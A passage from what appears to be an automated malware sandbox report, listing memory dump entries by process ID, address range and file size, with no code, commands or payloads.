                                                                                                            • memory/2812-275-0x00000168FFE00000-0x00000168FFEFF000-memory.dmp
                                                                                                              Filesize

                                                                                                              1020KB

                                                                                                            • memory/2812-184-0x00000168FD520000-0x00000168FD56B000-memory.dmp
                                                                                                              Filesize

                                                                                                              300KB

                                                                                                            • memory/2812-185-0x00000168FD800000-0x00000168FD870000-memory.dmp
                                                                                                              Filesize

                                                                                                              448KB

                                                                                                            • memory/3116-130-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3152-128-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3272-152-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3280-369-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3300-188-0x00000000042F0000-0x000000000434C000-memory.dmp
                                                                                                              Filesize

                                                                                                              368KB

                                                                                                            • memory/3300-180-0x0000000000860000-0x0000000000961000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3300-164-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3632-161-0x0000000000000000-mapping.dmp
                                                                                                            • memory/3880-151-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4008-114-0x00007FFFAE710000-0x00007FFFAE77B000-memory.dmp
                                                                                                              Filesize

                                                                                                              428KB

                                                                                                            • memory/4092-134-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4120-187-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4160-309-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4160-310-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/4160-311-0x0000000000520000-0x000000000066A000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.3MB

                                                                                                            • memory/4200-265-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4200-267-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                              Filesize

                                                                                                              88KB

                                                                                                            • memory/4204-306-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4280-272-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4280-269-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4300-200-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4356-315-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4464-294-0x0000000000945000-0x0000000000947000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4464-276-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4464-280-0x0000000000940000-0x0000000000942000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4464-291-0x0000000000944000-0x0000000000945000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4464-290-0x0000000000942000-0x0000000000944000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4568-263-0x0000000005A50000-0x0000000005ADD000-memory.dmp
                                                                                                              Filesize

                                                                                                              564KB

                                                                                                            • memory/4568-220-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4568-256-0x00000000048A0000-0x00000000059A2000-memory.dmp
                                                                                                              Filesize

                                                                                                              17.0MB

                                                                                                            • memory/4568-243-0x0000000010000000-0x0000000011157000-memory.dmp
                                                                                                              Filesize

                                                                                                              17.3MB

                                                                                                            • memory/4568-262-0x00000000059B0000-0x0000000005A4F000-memory.dmp
                                                                                                              Filesize

                                                                                                              636KB

                                                                                                            • memory/4612-222-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4660-322-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                              Filesize

                                                                                                              288KB

                                                                                                            • memory/4660-298-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4660-301-0x0000000001180000-0x000000000118D000-memory.dmp
                                                                                                              Filesize

                                                                                                              52KB

                                                                                                            • memory/4692-297-0x0000000002100000-0x0000000002102000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4692-285-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4692-304-0x0000000002102000-0x0000000002104000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4692-305-0x0000000002104000-0x0000000002105000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4744-245-0x0000000004260000-0x00000000042F1000-memory.dmp
                                                                                                              Filesize

                                                                                                              580KB

                                                                                                            • memory/4744-247-0x0000000000400000-0x0000000003DF0000-memory.dmp
                                                                                                              Filesize

                                                                                                              57.9MB

                                                                                                            • memory/4744-231-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4772-364-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4844-248-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/4844-244-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4876-342-0x0000000003F75000-0x0000000004076000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/4876-333-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4876-343-0x0000000004080000-0x00000000040DC000-memory.dmp
                                                                                                              Filesize

                                                                                                              368KB

                                                                                                            • memory/4892-255-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4892-250-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4916-307-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4956-254-0x0000000000000000-mapping.dmp
                                                                                                            • memory/4992-314-0x0000000000401480-mapping.dmp
                                                                                                            • memory/4992-313-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                              Filesize

                                                                                                              284KB

                                                                                                            • memory/4992-317-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                              Filesize

                                                                                                              284KB

                                                                                                            • memory/5012-358-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5012-308-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5036-257-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5064-261-0x0000000000DC0000-0x0000000000DC2000-memory.dmp
                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/5064-258-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5080-312-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5080-316-0x0000000003F30000-0x0000000003F74000-memory.dmp
                                                                                                              Filesize

                                                                                                              272KB

                                                                                                            • memory/5108-359-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5240-319-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5292-362-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5360-325-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/5360-320-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.5MB

                                                                                                            • memory/5360-321-0x00000001401FBC30-mapping.dmp
                                                                                                            • memory/5408-323-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5416-363-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5496-330-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.0MB

                                                                                                            • memory/5496-326-0x00000001402CA898-mapping.dmp
                                                                                                            • memory/5496-327-0x000002897AF60000-0x000002897AF74000-memory.dmp
                                                                                                              Filesize

                                                                                                              80KB

                                                                                                            • memory/5496-324-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                              Filesize

                                                                                                              7.0MB

                                                                                                            • memory/5552-365-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5676-356-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5800-357-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5820-328-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5840-329-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5864-361-0x0000000000000000-mapping.dmp
                                                                                                            • memory/5980-366-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6024-367-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6060-331-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6072-332-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6076-360-0x0000000000000000-mapping.dmp